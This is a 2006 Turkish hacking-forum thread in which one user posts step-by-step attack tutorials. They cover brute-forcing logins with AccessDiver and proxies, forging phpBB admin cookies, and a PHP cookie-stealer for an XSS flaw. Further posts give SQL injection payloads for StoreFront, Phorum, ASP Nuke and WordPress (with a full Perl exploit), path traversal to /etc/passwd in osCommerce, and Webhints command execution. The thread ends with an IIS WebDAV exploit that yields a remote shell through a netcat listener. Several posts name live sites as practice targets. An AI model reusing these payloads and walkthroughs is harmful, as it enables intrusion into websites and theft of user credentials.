bulur Geçelim bu programı nasıl kullanıcaz ilk önce http://www.accessdiver.com/download/ad4.92.exe adresinden acces diverı indirin ve kurun ondan sonra ayarlara geçelim ad yi açtığınızda yukarda my skill yazısı var ordan expert i seçiyoruz sonra sonra setting e bastığımız ilk yerde sağ tarafta stopping a security test after var onun altında never stop ve search in yor history also var ikisinide tickleyin ve artık settingin yanındaki proxy e gelelim proxy e girdiğimizde en başta use WEB proxies tickleyelim sonra allta rotate proxies vartickledikten sonra yanındaki sayıyı 2 yapalım sonra onun altındaki proxy skipping kısmıdan ilk üçünü tickleyin bulacağımız proxyler sitenin sizin ipnizi banlamaması için binevi sizi korur ondan sonra sıra geldi proxyleri bulmaya http://www.deny.de/phpbb2/ adresine üye olduktan sonra proxy dump kısmından proxy e grin ve orda yüzlerce kaliteli proxyler bula bilirsiniz burdan bulduğunuz proxyleri bir metin belgesinin içine kaydedin şimdi sıra bu proxyleri test etmeye geldi yukardaki my listin yanındaki proxy analyzer girin ordan kaydetiğiniz proxyleri açın ve speed/accuracy tester a basmadan önce bir kaç ayar yapacaz ilki aşağıdaki 5 kutunun 1,2 ve 4 üncüsünü tickleyin ondan sonra speed/accuracy tester basın birkaç dakikadan sonra çalışmayan proxyler ayıklanmış olacak ama işimiz bitmedi speed/accuracy tester ın yanındaki confidentiality ye tıklayın birkaç dakka sonra bu işlemde bitmiş olacak bittikden sonra ticklediğimiz kutuların yanındaki proxyjudge ye tıklıyoruz ordan level yazısının altındaki 1 den 5 e kadar olanlardan 5,4,3 ü tickliyoruz ve del e basıyoruz ondan sonra bu sağlam proxyleri yukardanki icon a basarak bu proxyleri kaydediyoruz sonra tekrar my liste geçerek sağ tarafdaki dosya açma işine yarayan icona basıyoruz ve kaydettiğimiz sağlam proxy dosyasını açıp en baştakine bi kere basıp seçiyoruz şimdi sıra combo liste geldi combo listi de açtıkdan sonrayukardaki server yazan sarı yere kıracağımız adresin members lı urls ini oraya yazıp sol tarafdaki standart butonuna bastıkdan sonra ad işleme başlıyarak şifre bulmaya çalışıyor işte bu program bu kadar bişe yukarda vermiş olduğum ayarlar benim kullandığım ayarlardır unutmadan bor hzınız en bağlantı hıza göre değişir ben 56K modemle 75 kullanıyorum ================================================== =============================== Döküman Alıntıdır. Düzenleyen OuTLaWsys : 15-04-2006 at 11:52.

03-04-2006, 21:03	#8
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	PHPbb Forumlarda Cookie Editleyip Admin Olmak ##################Document Written by OuTLaWsys########################## Dökümanın tarafımdan yazıldığını belirterek her şekilde yayınlayabilirsiniz. Bu yazıda olayın mantıgı ayrıntılı bir biçimde anlatılmıştır.Bu döküman sayesinde bir zamanlar bir çok kişi phpBB forumlarında admin seviyesine ulaşıp forumları hacklemiştir. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 1-)Her şeyden önce admin in md5 hashini aldığınızı varsayarak işe başlıyoruz. Bu döküman için admin md5 hashi 80e623f2e3ce5e440e7d69ddbdfbb2a2 olsun. (md5 hashini forumun versiyonuna göre SQL injection ya da başka yöntemlerle alınır.Burda admin hashinin nasıl alındığından değilde cookie ile oyanayıp nasıl admin seviyesine ulaşacağımız anlatılmaktadır.) 2-)Hackliyceğimiz kişinin(adminin) user id sini bilmemiz gerekiyor.Bunun için forumdaki memberlist bölümünden admin için viewprofile dediğimiz zaman browserda şu şekilde bir url yazar.Bu döküman için adminin user id si 3 olsun. http://hedef/phpbb/profile.php?mode=viewprofile&u=3 İşte burda sondaki "3" kullanıcın user id sidir. 3-)Cookie editliyceğimiz için ya bir Cookie editor yada Firefox Browser kullanın.IE da cookie editlenmesi engellenmiştir. Benim kendi PC imde cookieler burda saklanıyor. C:\WINDOWS\Application Data\Mozilla\Firefox\Profiles\default.rgv\cookies. txt Şimdi ilk olarak foruma gidip bir hesap açtırıyoruz kendimize.Sonra login olmak için username ve passwordumuzu giriyoruz ve "remember me" yada buna benzer olan her siteye girdiğinzde sizi tanımasını sağlıycak kutucugun yanına işaretimizi koyup login oluyoruz.Şimdi loginn olduk logout olmadan pencereyi kapatıyoruz yanlız kesinlikle logout olmak yok. Şimdi gidip cookies.txt dosyamızı açıyoruz.Burada hedef sitemiz ile ilgili olan bölümü buluyoruz.Eğer bulmakta zorluk çekiyorsanız Mozilla cookie editor ile bütün cookieleri silip bir daha deneyin.Şimdi gerekli bölümü bulduk. www.hedef.com FALSE / FALSE 1114433252 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2260cfdede09a57a46e90111c95bf2885c%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%224%22%3B%7D Şimdi haklı olarak burdan birşey anlamıyorsunuz.Bakıyorsunuz sadece şimdi biraz inceleyelim.Burdaki % li değerlerin anlamlarına gelince. %3A------->: %7B------->{ %22------->" Bakın ne çıkıyor bunu decode edince. a:2:{s:11:"autologinid";s:32:"60cfdede09a57a46e901 11c95bf2885c";s:6:"userid";s:1:"4";} şimdi burda bizim ile gerekli olan 2 şey var. 1-)60cfdede09a57a46e90111c95bf2885c işte bu sizin şifrenizin md5 algoritması ile kriptolanmış hali. 2-)";s:6:"userid";s:1:"4";} burdaki sondaki 4 de sizin user id niz. şimdi adminin md5 hashi ile user id sini hatırlayalım md5 hash:80e623f2e3ce5e440e7d69ddbdfbb2a2 user id:3 Ewet şimdi cookies.txt dosyamızı notepad ile açıp editliyoruz. Bu ilk bizim olan cookie a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2260cfdede09a57a46e90111c95bf2885c%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%224%22%3B%7D Bu editlediğimiz hali ile cookie a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2280e623f2e3ce5e440e7d69ddbdfbb2a2%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%223%22%3B%7D Eğer bu iki string i incelerseniz.Nerelerin Değiştirilmiş oldugunu rahatlıkla anlarsınız. Sonra bu cookies.txt dosyamızı kaydedip.Mozilla ile siteye gidiyoruz.Eğer hata yapmamışsak Hop bir bakıyoruz admin olarak login olmuşuz siteye. #Document Written by OuTLaWsys#

03-04-2006, 21:05	#9
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	XSS in phpBB 2.0.16 phpBB 2.0.16 versiyodaki XSS (cross site scripting) açığından dolayı cookie bilgilerini çalmak mümkün.Bununla ilgili hazırladığım bir tutorial. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 Herkese kolay gelsin http://rapidshare.de/files/3573814/phpbb2.0.16.rar.html Videoda Gözüken Cookie Stealer Kodları <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('steal.php', 'a'); fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' '); fclose($fp); ?>

03-04-2006, 21:08	#10
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	Shell Account Hakkında Geniş Bilgi... SHELL ACCOUNT : Shell Account. Dikkat bu sayfadaki yazılar Turkish Scene 5. sayıdan alınmıştır. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 SAYFADA YAZILAN HER SEY HELLRAZOR A AITTIR LTF YAZILARI DEGISTIRMEYINIZ ------------------------------------------------------------------------ ''BOLUMLER'' 1- SHELL ACC NEDIR? 2- BENİM ISP IM SHELL ACC VERIYOR MU? 3- SHELL ACC KONTROLU 4- SHELL INIZIN TIPI 5- SHELL TIPLERI 6- SHELL ACC VEREN BEDAVA VE PARALI YERLER -YERLI YABANCI 7- SHELL SINIFLANDIRILMASI 8- SON OLARAK SHELL ------------------------------------------------------------------------ 1 SHELL ACCOUNT NEDIR??? SHELL ACC GENEL ANLAMINDA EVINIZDEKI BILGISAYARDA UNIX KOMANDLARINI KULLANMANIZI SAGLAR .BU SAYADE UNIX KURULU BIR SISTEMDE CALISMIYOR SANIZ YA DA DAHA ONCE HIÇ UNIX KULLANMAMISSANIZ ALICAGINIZ ACC ILE WIN UZERINDEN UNIX KULLANMA FIRSATI YARATICAKSINIZ... NOT:ELLE DERGISININ İLK SAYISINDA HACKERLARLA ILGILI BIR YAZI OLDUGUNU OGRENDIM.DERGIDE TAKMA ISMINI BILE VERMEK ISTEMIYEN BU ARKADASIN SOYLEMIS OLDUGU KONUMUZLA ILGISI OLAN SEYI AYNEN YAZIYORUM ------------------------------------------------------------------ ELLE:Turkıyede hack ve crack olayları ıle ugrasan ınsanlar varmı? DATCRACK:Cok var hackıng ınsanların ılgısını cekıyor.Sırf hackıng yapabılmek ıcın evınde wındows sıstemınden UNIX sıstemıne gecıyor ------------------------------------------------------------------ SIMDI BURADA NE VAR?? BU CUMLEYE DIKKAT!'evınde wındows sıstemınden UNIX sıstemıne gecıyor' UNIX SISTEMI ÇOK KUVETTLI KONFIGURASYON ISTEYEN BIR SISTEMDIR AYRICA EV KULLANICILARI ICIN COK PAHALI BIR SISTEMDIR ARTIK SHELL IN NE OLDUGUNU VE NEYE YARADIGINI ANLADINIZ /////////////////////////////////////////////////////////////////////// 2- BENIM ISP IM SHELL ACC VERIYORMU? BU KONUDA TURKIYEDE ARAMADIGIM ISP KALMADI.ARADIKLARIMIN %80 NE OLDU GUNU BILMEDIKLERINI %20 SI ISE VERMEDIKLERINI SOYLEDI BILENLERDEN 2 TANESI BENIM NEDEN SHELL ACC ISTEDIGIMI NE ISLE UGRASTIGI MI FILAN SORDU ) TAVSIYE HICBIRINI ARAMAYIN AMA YINEDE SHELL ACC KONTROLU YAPALIM Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 /////////////////////////////////////////////////////////////////////// 3- SHELL ACC KONTROLU SISTEMIMIZDE BIR ACC VARMI? BUNUN CEVABINI ANCAK KONTROLEDEREK SOYLERIZ ADINI VERMIYECEGIM BIR ISS (YERLI) 2 SENE ONCEKADAR SHELL ACC VERIYORDU TABI UYELERI BU GUNE KADAR KONTROL ETMEDIGI ICIN HIC KIMSE FARKINA VARMADI KESINLIKLE ISS IN SIZE SHELL VERICEGINI SANMAYIN NORMALDE SIZIN ONU ACTIR MANIZ LAZIM O DA 10 $ CIVARINDA OLMALI(TABI ARTIK ISS LER SHELL VERMIYOR) Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 SISTEMDEKI SHELL KONTROLU ICIN WIN ICINDE BULUNAN TELNET I ACIN , NASIL MI? BASLAT(START) MENUSU BUL(FIND) DOSYALAR VE KLASORLER E GELIN SABIT DISKTE TELNET DIYE ARATIN 1 ADIM TELNETI ACIN UC BIRIM YADA TERMINAL OZELLIKLERINDEN YAZI TIPINI BIRAZ KUCULTUN 2 ADIM BAGLAN SONRADA UZAKTAKI SISTEM YA DA CONNECT VE REMOTE SISTEM E BASIN 3 KARSINIZA BI KUTU CIKACAK HOST NAME:BU KISMA ISSIN SIZE VERDIGI EMAIL ADRESININ (ABUZER@XXX.COM) XXX.COM OLAN BOLUMUNU YAZIN BAGLANTI NOKTASI YA DA PORT DA TELNET KALSIN UCBIRIMTURU DE VT100 OLUCAK BUNDAN SONRA CONNECT E BASIN EGER KARSINIZA BIR MENU CIKARSA LOGIN FILAN SORARSA BU SHELLINIZ VAR DEMEKTIR /////////////////////////////////////////////////////////////////////// 4-SHELL ACC ININ TIPI SHELL INIZIN NASIL OLDUGUNU BU KOMMANDI �ls -alF� VERIP ANLIYACAGIZ ls -alF total 37 drwx--x--x 5 galfina user 1024 Apr 18 11:35 ./ drwxr-xr-x 380 root wheel 6656 Apr 18 18 :15 ../ -rw-r--r-- 1 galfina user 2793 Apr 18 111:16 BU GİBİ YAZILAR CIKARSA SIZIN SHELLINIZ GERCEKDEN II BIR SHELL DEMEKTIR /////////////////////////////////////////////////////////////////////// 5-DEGISIK SHELL ACC TIPLERI ARTIK SHELL INIZI 1s -alF YI KULLANARAK ELINIZDE NE OLDUGUNU ANLADINIZ SIMDI VERICEGINIZ KOMMAND ISE �echo $SHELL�(AYNISINI YAZIN)SIZE NE TUR SHELLINIZ OLDUGUNU SOYLEYECEKTIR HER SHELLIN FARKLI AMACLARI VE KULLAN IM YERLERI VARDIR. �echo $SHELL� DEN SONRA CIKAN YAZILARDA : /bin/bash İSE BASH shell INIZ VARDIR /bin/sh İSE bourne shell INIZ VARDIR /bin/ksh İSE KORN shell INIZ VARDIR /bin/csh İSE C SHELL INIZ VARDIR /bin/tcsh İSE TCSH SHELL INIZ VARDIR /bin/zsh İSE Zsh SHELL INIZ VARDIR YENI BASLAYANLAR ICIN BASH ILERISI ICIN C ONERILIR NOT echo $SHELL OLAMAZSA echo $shell İ DENEYİN ////////////////////////////////////////////////////////////////////// 6-SHELL ACC VEREN YERLI VE YABANCI YERLER BEDAVA SHELL ACC KIMSE VERMEZ ANCAK DENEMELIK BIR SURE ICIN ALABILIRSINIZ TABI PARA ILE SATAN YERLERDE VAR..... TURKIYEDE 1 TEK BULABILDIGIM wwwentagraph.net ADRESİ 10 $A AÇILIS 10$ A 1 AYLIK SHELL VERIYORLAR VERDIKLERI SHELL TIPLERINI ORADAN OGRENEBILIRSINIZ YABANCI SITELER(BEDAVA) www.unıxnet.org www.freeshells.net www.vexatıon.org www.nyx.net bu adreslerden www.nyx.net SIZI HEMEN SISTEME BAGLIYORLAR ADRESLERI BROWSER INIZA BU ADRESI YAZIN telnet:/nyx.net/ //////////////////////////////////////////////////////////////////// 7- SHELL LERIN SINIFLANDIRILMASI SHELL / \ / \ / \ BOURNE C / \| \| \ / \ SH KSH Zsh BASH CSH TCSH YUKARDAKI SINIFLANDIRILMADAN SONRA YAZACAGIMIZ SHELL SCRIPT ILE BOURNE SHELLERI ,C SHELL ICIN YAZACAGIMIZ SCRIPT ILE DE C SHELL CALISTIRILIR NOT: IKI FARKLI SHELL SCRIPT I BIRBIRINE EKLEMEK BOURNE SHELL LERI ''.'' KOMANDINI KULLANARAK C SHELLERI ''source'' DIYE KULLANILARAK YAPILABILIR....... /////////////////////////////////////////////////////////////////////// 8 SHELLER ILE SON OLARAK SANIRIM KAFANIZI KURCALIYAN BU SHELL KONUSU ARTIK SIZE DAHA KOLAY GELMEKTEDIR.EGER SHELL E PARA VERMEK ISTEMIYORSANIZ DEDIGIM BEDAVA ADRESLERDEN SHELL ALABILIRSINIZ *BEDAVA SHELL ALDIGINDA YAPMANIZ GEREKENLER LOGIN VE PASSWORD U NUZU KIMSEYE VERMEYIN SİSTEMI IYICE ANLAMADAN HACK OLAYLARINA BASLAMAYIN SISTEM YAVASLARSA PANIK YAPMAYIN YAZDIKLARINIZA DIKKAT EDIN KULLANDIGINIZ BIR UNIX SISTEMI DOS A BENZEMEZ ------------------------------------------ BEDAVA SHELL ACCOUNT VEREN YERLER : Nyx NYX firmasy email hizmeti, UNIX sistemi üzerinden Internet (ftp, telnet, www, vb.) hizemetleri veriyor. Ayny zamanda 100K lyk bir web alanyda veriyor. Tabi ücretsiz Havoc.net Havox netten account alabilmek için satan@havoc.net adresine Ysminizin, kullanycy ady ve ?ifrenizin oldu?u bir mail atyn. Mail adresiniz do?ru ise mail adresinize bilgi gelecektir Global Unix FreeNet Web sitenize hostluk ya?yyorlar, UNIX tabanly IRC, C programlary derleme, CGI scriptleri yazabilme, ve popüler mail, news reader gibi programlary kullanabilme. Katylym formu adreste... Pooki.Smartec.Com Formu doldurun ve shell accountunuz, IRC, home page vb. hizmetleriniz olsun Nether Nets Nether news FTP,Telnet,IRC, WWW (Lynx),News, home pages vb. için shell account sa?lyyor. Kullanycy kayyt için Telnet gerekiyor. HEAP Bu ?irkette bedava shell account veriyor ama herhangi bir bilgim yok. Bru-Noc 10 MB web alany tam bir CGI eri?imi, email account ve shell account. FTP, HTTP, shells, PERL, C kodu derleme ve bazy Unix Araçlary. Bot yok... DucTape 2MB alan verir, T1 ba?lanty, email, pop3, imap4, lynx, website için CGI, ve IRC eri?imi. paraly accountlar için bot izni Hobbiton Bu tip i?lere hostluk yapyyor ama 24 saat de?il.. Email, lynx, C programy derleme, web site için cgi, irc, BitchX, telnet, ftp, eggdrop... CM 10 MBlyk T1 Ba?lantysy veriyorlar,i?letim sistemi Debian Linux, IRC botlaryna izin var. Çoğu arkadaş shell account hakkında soru soruyordu.Bilgilerinize. ALINTIDIR

03-04-2006, 21:15	#12
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	Wordpress 1.5.1.1 SQL Injection Video Dökümanını yukarda yazdıgım açığın videosu http://rapidshare.de/files/8446241/W...cking.rar.html

03-04-2006, 20:50	#2
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	##############StoreFront SQL Injection########### Versiyon:6.0 ve aşağısı Written By OuTLaWsys Açık sadece yapacağınız çok birşey yok aslında ama paylaşmak istedim buyrun 1-) herhangi bir arama motoruna gidioruz (Google vb.) 2-)Storefront+login.asp ya da başka kombinasyonlar uygulayıp storefront login url sine ulaşıoruz. 3-)www.hedef.com/login.asp yada benzeri bir login.asp ye ulaşıoruz. 4-) login : example@example.com passwd : ' or 'a'='a YAZIP ENTERLIORUZ 5-) bu sayede ilk üye olan kişinin hesabına girmiş bulunuoruz.burda kişisel bilgiler falan bulunuor. mesela bu kişinin diğer email adresini falan biliorsanız gidip bu bilgilerle şifreyi alabilirsiniz ya da başka şeyler yapabilirsiniz bu size kalmış. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 Eğer farklı bişey bulursanız sizde paylaşın Döküman OuTLaWsys Tarafından Yazılmıştır.

03-04-2006, 20:51	#3
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	#############Oscommerce 2.2 Bug############### Document Written by OuTLaWsys 1-)Bir arama motoruna gidioruz(google ya da vb ) 2-)admin/file_manager.php die arattırıoruz. 3-) çıkan sitelerden şu url ye gittiğimizde www.site.com/admin/file_manager.php Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 bir de ne görüoruz File Manager :=) 4-)sonra şu şekilde http://www.hedef.com/admin/file_mana.../../etc/passwd yapıp şifreleri de alabiliriz. Değişik kombinasyonlar yapmak elinizde ne de olsa File manager karşınızda hade kolay gelsin Döküman OuTLaWsys Tarafından Yazılmıştır.İZİNSİZ KOPYALAMAK YASAKTIR.

03-04-2006, 20:52	#4
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	##############Phorum 5.*########### Document written by OuTLaWsys Phorum 5.x lerde işe yarayan bu açık ile admin username ve pass ini görebilirsiniz (pass md5 hashlidir.Bunun hakkında bilgi için forumdaki md5 başlıklı konulara bakabilirsiniz.) http://www.hedef.com/phorum5012/foll...1%2c1%2c1%2cCO NCAT(username%2c%27\|%27%2cpassword)%2c1%2c1%2c1%2c 1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%2 0phorum_users%20WHERE%20admin=1 Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 Bunu bilgi amaçlı buraya yazdm.Abuk sabuk eleştirelerinzle başlığı kirletmeyelim! By OuTLaWsys IZINSIZ KOPYALAMAYINIZ

03-04-2006, 20:55	#5
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	########Document Written by OuTLaWsys########### ASP Nuke versiyon 0.80 ile hazırlanmış sayfalardaki comment_post.asp dosyasındaki hatadan dolayı admin username ini ve passwordunun sha256 hashli halini alablirsiniz. Adres çubugunda site adresinin sonuna ekleyeceğimiz bi kaç şey ile username ini ver pass i alabilrsiniz. Örnek: Username için: http://www.hedefsite.com/module/supp...askID=Username Password sha256 hashi için http://www.hedefsite.com/modules/sup...askID=Password (sha256 hashi kırıp kırmamak size kalmıştır.İlla her yeri hackliyip index atcaksınız die bir kaide yoktur.Açık açıktır )

03-04-2006, 20:59	#6
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	WEBHINTS COMMAND EXECUTION Webhints scriptlerde ki açık ile uzaktan komut çalıştırabilioruz.Bu açık v1.3 ve altında çalışıor.İşleyişi ise şu şekilde. www.site.com/cgi-bin/hints.pl?\|KOMUT\| Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 ya da www.site.com/hints.pl?\|KOMUT\| bakın bi tanede açığın oldugu site örnek olsun http://www.johnsesl.com/cgi-bin/hints.pl?\|uname\| Burda Komutlardan Kasıt .nix Komutlarıdır

03-04-2006, 21:00	#7
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	WordPress 1.5.1.1 SQL INJECTION #################WordPress 1.5.1.1##################### Document Written by OuTLaWsys Gerekli olanlar 1-)Active Perl 2-)Exploit Bu exploit sayesinde Wordpress 1.5.1.1 versiyon kullanan sitenin adminin username ini password nü (md5 hashli) alabiliriz.Md5 hash i kırıp kırmamaya kalkışmak size kalmıştır ben sadece açığı ve nasıl kullanılacağını anlatıyorum. Bilgisayarımıza active perli kurduğumuzu varsayarak işimize başlıyoruz.Yazının sonundaki perl code unu kopyalayıp text dosyasına yapıştırın ve farklı kaydet seçeneğini kullanarak dosyaadı bölümüne wordpress.pl yazıp dosyayı perl/bin klasörününzün altına .pl uzantılı olarak kaydedin(C:/perl/bin/ altına) Bundan sonra wordpress 1.5.1.1 versiyon kullanan bir site buldunuz diyelim. Başlat->Çalıştır->Command yazıp.DOs a geçioruz. burdan perl/bin klasörüne gidioruz.Sonra yapacağımız iş ise çok basit. perl wordpress.pl http://www.site.com/wordpress/ (burda wordpress klasörünün ismi sitede başka olabilir) Sonra bekliyoruz Şu şekilde bir sonuç alırsak iş tamamdır. [+] Connected to: http://www.xxx.com/wordpress/ [+] Username of administrator is: admin [+] MD5 hash of password is: 24258dfb50611325c4a689ca3574dac1 Size bir de örnek site buyrun üzerinde deneyin arkadaşlar. http://www.themirrorpool.com/wordpress/ Exploit code ları da aşağıda.Haydi kolay gelsin.(md5 hashlerini kırmak için en ii yol şu ana göre rainbow table lardır ama genede beyniniz bulanabilir ) #!/usr/bin/perl -w # # SQL Injection Exploit for WordPress <= 1.5.1.1 # This exploit show the username of the administrator of the blog and his password crypted in MD5 # Related advisory: http://www.securityfocus.com/archive.../30/0/threaded # Patch: Download the last version at http://wordpress.org/download/ # Coded by Alberto Trivero use LWP::Simple; print "\n\t======================================\n" ; print "\t= Exploit for WordPress <= 1.5.1.1 =\n"; print "\t= Alberto Trivero - codebug.org =\n"; print "\t======================================\n\n" ; if(!$ARGV[0] or !($ARGV[0]=~m/http/)) { print "Usage:\nperl $0 [full_target_path]\n\n"; print "Examples:\nperl $0 http://www.example.com/wordpress/\n"; exit(0); } $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_l ogi n%20FROM%20wp_users/") \|\| die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page=~m/<title>.?» (.?)<\/title>/ && print "[+] Username of administrator is: $1\n"; print "[-] Unable to retrieve username\n" if(!$1); $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_p ass %20FROM%20wp_users/") \|\| die "[-] Unable to retrieve: $!"; $page=~m/<title>.?» (.?)<\/title>/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 # milw0rm.com [2005-06-07]

03-04-2006, 21:13	#11
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	XMLRPC Command Execution Exploiti Resimli Anlatımı http://rapidshare.de/files/8446723/X..._305_.rar.html

03-04-2006, 21:15	#13
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	S-Cart SQL Injection Video Video Linki Aşağıdadır. http://rapidshare.de/files/8447196/S...ction.rar.html

03-04-2006, 21:16	#14
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	PHPNEWS SQL Injection Video http://rapidshare.de/files/8447943/P...ction.rar.html

04-04-2006, 10:55	#15
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	IIS 5.0 ı WebDaV açığında yararlanarak Hack Etmek(Bilinmeyen Bir Yöntemdir) ############################DOCUMENT WRITTEN BY OUTLAWSYS################# 04/04/2006 Hacking IIS 5.0 Burada yazdıgımız yöntem WebdaV açığını kullanarak sisteme girmekten ibarettir.Dökümanı IZINSIZ KOPYALAMAYINIZ. DavS açığını bir çok arkadaş sadece sayfaları deface etmek için kullanıp duruyor halbuki bu açığı çok daha etkin şekilde kullanmak mümkün.Bu metoddan daha önce kimse bahsetmemişti.Bende yazma gereği duydum. 1) Gerekli Programlar 1) xwbf-v0.3.exe (Webdav için Exploit) 2) PTwebdav.exe (Hedefin Vulnerable olup olmadıgını kontrol için) 3) A Scanner (IIS 5.0 Aramak için) 4) tftpd32.exe (tfpt server, dosya uploadı için) 5) Netcat (Port Listening işlemi için) olanlar opsiyoneldir.Programları aşağıdaki linkten download edebilirsiniz.AV Kullanan arkadaşlara söyliyorum.AV niz uyarı verebilir ama virus yada trojan olarak değil hacking tool olarak görmesinden kaynaklanır.Yani herhangi bir mesuliyet kabul etmiyorum. http://rapidshare.de/files/17163349/Hacking.rar.html 2)Vulnerable IIS 5.0 Arama Superscanner yada başka bir scanner ı çalıştırıp,herhangi bir ip aralıgını 80. i port için aratıyoruz. Örneğin bir tane ip buldugunuzda IP adresini PTwebdav.exe progrmaına yapıştırıyoruz ve check butonuna tıklıyoruz.Program IP yi kontrol ediyor ve eger açık varsa "Vulnerable" diye size belirtiyor.Eger "Not Vulnerable " derse açık yok demektir başka IP deniyoruz. 3)Exploiting Webdav Şimdi netcati açıp 666 nolu portu dinleyeceğiz(eger router arkası iseniz,port forwarding yapmanız gerekecektir) Şimdi Port listening olayı için DOS a çıkacağız. Bunun için başlata tıklayın,ordan çalıştıra tıklayın ve "cmd" yazıp enterlayın(tırnaklar yok) Sonra netcatin bulundugu klasöre geçin ve netcatin klasöründe şu komutu yazın nc -l -vv -p 666 Eger "Listening on any [666]" gibi bir mesaj alırsanız port listening işlemimiz tamamdır. Şimdi xwbf-v0.3.exe ile sistemi exploitliycez. "Satan's IP" yazan yere kendi ip nizi yazınız. "Target " yazan yere hedef sitenin ip sini yazınız. Geri kalan ayarlara dokunmayınız."Exploit" butonuna basınız.Şimdi program işini yapmaya çalışıyor Checking ntdll.dll buffer overflow .....CONNECTED send evil buffer ........ NOT VULNERABLE If you see this, the target is vulnerable: Gibir birşey çıkarsa sistem vulnerable değildir. Checking ntdll.dll buffer overflow .....CONNECTED send evil buffer ........ VULNERABLE Connecting to [ip address] .........CONNECTED trying ret addr 0x00d000d0 .........DONE Waiting for IIS to restart .........CONNECTED trying ret addr 0x00d100d1 .........DONE Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 Gibi bir şey çıkarsa Açık mevcuttur.Artık yapmanız gereken beklemek.Bazen çok beklemeniz gerekebiliyor hatta o kadar beklemeye ragmen genede giremeyebiliyorsunuz sisteme nedeni ise meçhul. Eger herşey tamamsa netcati açtıgımız DOS komut satırında hedef sistemin komut satırına düşmüşüzdür. Burdan Sonra yapacaklarınız tamamen size aittir.örneğin tftpd ile sisteme dosya atıp örneğin server win2000 ise rootlayabilirsiniz.ya da başka şeyler yapmanız mümkün gerisi için de biraz araştırısınız bazı şeyler elde edersiniz. #################DOCUMENT WRITTEN BY OuTLaWSyS###########################** Düzenleyen OuTLaWsys : 05-04-2006 at 22:50.

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama